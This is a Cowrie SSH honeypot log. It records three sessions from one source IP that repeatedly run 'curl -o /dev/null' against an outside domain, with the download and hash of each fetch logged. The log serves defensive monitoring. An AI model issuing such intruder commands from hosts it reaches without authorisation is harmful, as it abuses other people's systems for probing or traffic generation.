{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.192402Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.195204Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:12.200872Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.201545Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.228839Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:12.237269Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.237984Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:12.239805Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.240539Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:12.242651Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.243444Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:12.284088Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.284816Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:12.286696Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.287365Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:12.289296Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.290147Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.323577Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.325734Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.328408Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.331455Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.334231Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:12.335201Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.336109Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:12.338473Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.339101Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:12.342198Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.343022Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.379910Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.383483Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.386150Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.388936Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:12.390827Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.391909Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:12.394373Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.395289Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:12.397763Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.398500Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.406849Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.434284Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.437110Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.441115Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:12.442834Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.443792Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:12.446180Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.446953Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:12.449170Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.449808Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.459666Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.484648Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:12.486044Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.486574Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:12.489216Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.489706Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:12.513037Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.513668Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.517451Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:12.550991Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.551662Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.555628Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:12.556954Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.557429Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.560276Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.563881Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.568342Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:12.570753Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.571427Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.599224Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.601738Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:12.603260Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.603836Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:12.606331Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.606934Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.611323Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:12.635606Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.636380Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.641185Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.651052Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:12.660877Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:12.661568Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
